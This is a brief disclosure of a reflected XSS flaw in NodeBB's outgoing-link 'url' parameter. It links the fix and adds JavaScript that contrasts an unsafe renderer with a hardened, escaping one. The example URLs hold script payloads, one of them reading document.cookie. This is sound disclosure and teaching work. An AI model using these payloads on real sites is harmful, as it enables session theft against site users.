24.09.2015 - the vulnerability was published

Example of how to exploit the vulnerability:

http://www.[website]/outgoing?url=alert("XSS")
http://www.[website]/outgoing?url=<script>alert("CSXSS")</script>
http://www.[website]/outgoing?url=<script>alert(document.cookie)</script>

Vulnerability details:

Method: GET
Vulnerable parameter: url
File: src/controllers/index.js

As soon as I found the vulnerability, I made a pull request and fixed the vulnerability.

https://github.com/NodeBB/NodeBB/pull/3371
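
The pattern behind a reflected XSS in an outgoing-link page, next to one way to close it, as an added example that is not NodeBB's code and not the change from the pull request. The function names and the markup are hypothetical; the sample values are the url values from the example links above.

```javascript
'use strict';
// Added illustration: hypothetical names and markup, not NodeBB's code.

// Escape the characters that are significant in HTML text and attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[ch]));
}

// Vulnerable pattern: the raw `url` query value is concatenated into the page.
function renderOutgoingUnsafe(url) {
  return '<p>You are leaving the forum for <a href="' + url + '">' + url + '</a></p>';
}

// Hardened pattern: accept only absolute http(s) URLs, then escape on output.
function renderOutgoingSafe(url) {
  let parsed;
  try {
    parsed = new URL(String(url));
  } catch (err) {
    return null; // not an absolute URL: the caller should answer with an error page
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') {
    return null; // any scheme other than http/https is refused
  }
  const safe = escapeHtml(parsed.href);
  return '<p>You are leaving the forum for <a href="' + safe +
    '" rel="noopener noreferrer">' + safe + '</a></p>';
}

// The `url` values from the example links on this page.
const SAMPLE_VALUES = [
  'alert("XSS")',
  '<script>alert("CSXSS")</script>',
  '<script>alert(document.cookie)</script>',
];

for (const value of SAMPLE_VALUES) {
  const unsafeReflects = renderOutgoingUnsafe(value).includes(value);
  const safeResult = renderOutgoingSafe(value);
  console.log(JSON.stringify(value),
    '| unsafe reflects raw value:', unsafeReflects,
    '| safe handler:', safeResult === null ? 'rejected' : 'rendered');
}
```
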

Links:

PacketStorm Security

Vulnerability Lab